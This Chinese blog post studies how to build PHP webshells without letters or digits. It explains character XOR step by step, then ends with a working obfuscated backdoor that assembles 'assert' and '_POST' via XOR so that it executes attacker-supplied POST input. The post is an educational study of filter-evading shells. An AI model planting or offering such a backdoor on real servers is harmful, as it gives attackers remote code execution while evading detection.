No character shell study
前言
这篇博文是看了无字母数字Webshell之提高篇 - FreeBuf互联网安全新媒体平台,进行了一定的研究然后对异或进行了研究,从一开始的懵懵逼逼到后面的总结。
正文
先说说什么的异或吧,比如说:
<?php
echo "A"^"?";
?>
结果是~,为什么是 ~(懵逼)
异或过程:
先将异或的两个字符串转换为ASCII码
A的ASCII:65
?的ASCII:63
寻找对应的二进制:
ASCII码65的二进制为:0100 0001
ASCII嘛63的二进制位:0011 1111
异或过程,1碰0位1,0碰1为1,其他为0
0100 0001
0011 1111
0111 1110
结果为:01111110
寻找对应的ASCII码:
对应的ASCII码为:126
对应的字符串为:~
然后我们就得到了异或的整一个过程:
字符串->ASCII->二进制->二进制异或的结果->ASCII码->字符串
然后实现一个马子 :
<?php
$_0=("!"^"@").("3"^"@").("3"^"@").("%"^"@").("2"^"@").("4"^"@"); /*assert*/
$_1='_'.(hex2bin("10")^"@").(hex2bin("0F")^"@").(hex2bin("13")^"@").(hex2bin("14")^"@");
$_2=$$_1;
$_0($_2[_]);
?>
转载请声明:转自422926799.github.io
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。
文章标题:No character shell study
本文作者:九世
发布时间:2019-01-18, 13:36:12
最后更新:2019-04-19, 20:36:16
原始链接:http://jiushill.github.io/posts/390d804c.html版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。